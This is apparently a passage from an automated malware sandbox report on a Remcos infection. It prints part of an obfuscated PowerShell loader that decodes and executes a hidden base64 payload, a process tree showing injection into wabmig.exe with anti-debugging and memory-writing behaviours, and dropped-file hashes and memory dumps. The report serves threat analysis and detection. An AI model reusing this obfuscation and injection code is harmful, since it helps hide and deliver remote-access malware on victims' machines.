TonjeSk re=Tapes(F,dteT SavveNyhedsFl mptkapni-StoreP Rusta ndertU finhStats Anst$Po tmV.lokkiKlubboDakotlLsladeR dent RevetInfrie R tzsChair)Ripsa ') ;Lestobiotic (Vidvinkelkameraet 'Sovse$ Re.pgVat alSelvhoPrecob d.traIns rlCryoh:kreatJ ConcuOp,tad Tan,oYoghokHaemaa Shik=Arc e$AdamagN netlHal,moPolygbBinzuaEvisll.eage:Kool,dRseneaBif gmDocernF,nyaaAk.umtSakkaoPlumrrInspayUss l+Sekve+ yps%Fatal$.angomS udka Kla s BenzhMy opiBlattn romeeRe ursAmb lsDispa.QuickcAlb.mo nomouLi,jenFart,tBrn p ') ;$Overthrows=$mashiness[$Judoka];}$Tegningers=300517;$Medial=30436;Lestobiotic (Vidvinkelkameraet 'Fo en$IdentgHovedlFalteoHrkrmbTandraBrabbl Oxys:FistiD Kra eDisq n enomuChicknL.ggicSericiMa neaFredetCouraiB ttevGradue Lovf2Maim.1Sol,e8 Supe Unde=Fo,ko NoncoGFort.e RapstArthr-Ba.dpCzacatoAarrinIntertEmisseScribnB.sant,veru Besou$Pro,uVSt.ntiStdt o Tal lSkorzeWhoret.ncoltAntineKr.vos etud ');Lestobiotic (Vidvinkelkameraet ' Fa.t$ P etgBreddlDomfloSla sbDustiaPa kelRialt:FrinuHSjlehe Tv vlAus ul TjeneAn inbstum aFremhrkransdFy tjiWeekesIgnistFrdseeArd ar toze Conce=,oass ,ncon[F ftyS Stokyautoss TaxitRatioeMatrim,olum.AarsdCHarleoSp nsnUnsurvUnreveEun.krUafhntPrefi]Triqu:Bndse:SectiFTipolrKampio Sonam depaBKatteaSteresBundfeKylli6Decer4UdeluSPre at ,kunrTag,eiAnomonPulicgImp t(Pa,jf$ TillDThermeCowb.nDe inuSputanqueercma emiSona aBjlentClutti ,saavBondeePulpa2 End 1Godke8Du er) salo ');Lestobiotic (Vidvinkelkameraet 'Sparr$ UnfogBypaslAguilo B ndb GustaAdvoklpalae:HovedDFlgbrrSinewg Refee formnSelade Lichs Odo, Iodop=Jekat Stokk[ArbejSNo.rayAdjacs Tar tParteeRel smUnexp.HaphtTForske emi,x FordtNep,r. Far.EIndsnnP dgic ServoUnwi.dGangsiHarnin lodagValdh] visu:Til,l:DobbeA ymphS P,ltC FyrsILirekI ,asi.DekanGFragteSigmatPaintS Wed tSkuesrKongsiProcrnPommegRea,p(Forst$ TidsHSkulkeS redlSarcolEducaeDisembSpartatiggerBevindOsciliTrolds,ejrstBaldeeStatsrBnder)Wirep ');Lestobiotic (Vidvinkelkameraet 'Athwa$Out hg SerblBasiloLandfbslikaaComfol yphe:FusenBSlje e fugnk MandeSolvrnStraad UnhatauburhSu.fueMemord Cent9 ind5Dkrl.=El te$IconoD TranrTo grgSalige FopdnnabobeAutovsBorde. Phans.iggeuva albFinensMusvitFe rarIndvai BortnStyreg Un t(Diarr$AftviTobrazeargoagLinjenR adfiFjer nBo tegStatsemisaprDgnbosLeat.,Scath$OsphrMPaakleGoldtdFre diThyroaNigrelContr)Mud e ');Lestobiotic $Bekendthed95;"
            4⤵
            • Network Service Discovery
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1320
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Frauke.Sik && echo t"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3568
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:4048

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat
      Filesize

      144B

      MD5

      78592bae17255d9439916afa8f8a6cb7

      SHA1

      1ed979cbd7baff10a0823d2c6c3726ea938796f0

      SHA256

      c0d596d0bb4e57fbb7e943c01366c10f5cb104b595c911a830cc1829cfbccbed

      SHA512

      fd79f2a43bbf71f181bb557ec7e36e9c741a515111f1f487460e9d3ce1e09e37c974296f59a9f76a1b8664cb775988e01bd5c51fbcc41efe5db932be966feb54

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hoekqemv.0q0.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Frauke.Sik
      Filesize

      430KB

      MD5

      340b7035f03c7f21d32ff6399ca95468

      SHA1

      75f997ca6d1ebe069dd6c072aad8396c8b4cbd6f

      SHA256

      60e8f01cf7048089ceaa756fd0569338edf71b36c3fe7f92eeacf9e0637f29d6

      SHA512

      594c3f149953169383c14de8c74cfd755717130f600137a0d1787faa3a0229799c7f5f1dd507ee411dc8dc9b98069ca22ec4c135065a38f8daf7b673826ed42f

      Download Submit

    • memory/1320-37-0x0000000006420000-0x000000000643E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1320-40-0x00000000069D0000-0x00000000069EA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/1320-45-0x0000000008E50000-0x000000000D08D000-memory.dmp

      Filesize

      66.2MB

      Download

    • memory/1320-43-0x00000000088A0000-0x0000000008E44000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1320-41-0x00000000076C0000-0x0000000007756000-memory.dmp

      Filesize

      600KB

      Download

    • memory/1320-22-0x0000000004F50000-0x0000000004F86000-memory.dmp

      Filesize

      216KB

      Download

    • memory/1320-23-0x0000000005690000-0x0000000005CB8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/1320-24-0x0000000005540000-0x0000000005562000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1320-26-0x0000000005D30000-0x0000000005D96000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1320-25-0x00000000055E0000-0x0000000005646000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1320-36-0x0000000005E20000-0x0000000006174000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1320-42-0x0000000007650000-0x0000000007672000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1320-38-0x0000000006460000-0x00000000064AC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/1320-39-0x0000000007C70000-0x00000000082EA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/4048-47-0x0000000002460000-0x000000000669D000-memory.dmp

      Filesize

      66.2MB

      Download

    • memory/4048-61-0x0000000001200000-0x0000000002454000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4048-62-0x0000000002460000-0x000000000669D000-memory.dmp

      Filesize

      66.2MB

      Download

    • memory/4200-16-0x00007FF9EF3C0000-0x00007FF9EFE81000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4200-4-0x00007FF9EF3C3000-0x00007FF9EF3C5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4200-21-0x00007FF9EF3C0000-0x00007FF9EFE81000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4200-18-0x00007FF9EF3C0000-0x00007FF9EFE81000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4200-15-0x00007FF9EF3C0000-0x00007FF9EFE81000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4200-17-0x00007FF9EF3C3000-0x00007FF9EF3C5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4200-46-0x00007FF9EF3C0000-0x00007FF9EFE81000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4200-65-0x00007FF9EF3C0000-0x00007FF9EFE81000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4200-5-0x000001CA643C0000-0x000001CA643E2000-memory.dmp

      Filesize

      136KB

      Download